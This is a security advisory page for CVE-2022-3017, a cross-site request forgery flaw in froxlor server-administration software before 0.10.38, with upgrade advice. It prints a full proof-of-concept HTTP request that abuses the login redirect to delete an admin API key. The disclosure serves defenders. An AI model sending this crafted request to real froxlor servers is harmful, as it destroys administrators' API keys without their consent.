Cross-site Request Forgery (CSRF) Affecting froxlor/froxlor package, versions <0.10.38
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.09% (39th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PHP-FROXLORFROXLOR-3009130
- published 30 Aug 2022
- disclosed 30 Aug 2022
- credit vict0ni
Introduced: 30 Aug 2022
CVE-2022-3017 Open this link in a new tabHow to fix?
Upgrade froxlor/froxlor
to version 0.10.38 or higher.
Overview
froxlor/froxlor is a server administration software.
Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) by sending a crafted link to Froxlor admin. Exploiting this vulnerability is possible due to the login functionality and the way of API key deletion, which is possible via a GET
request.
POST /index.php HTTP/2
Host: froxlordomain
Content-Length: 129
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="104"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://demo.froxlor.org
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://demo.froxlor.org/index.php?s=&script=admin_index.php&qrystr=page%3Dapikeys%26action%3Ddelete%26id%3D2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
script=admin_index.php&qrystr=page%3Dapikeys%26action%3Ddelete%26id%3D2&loginname=admin&password=admin&language=profile&send=send
References
CVSS Scores
version 3.1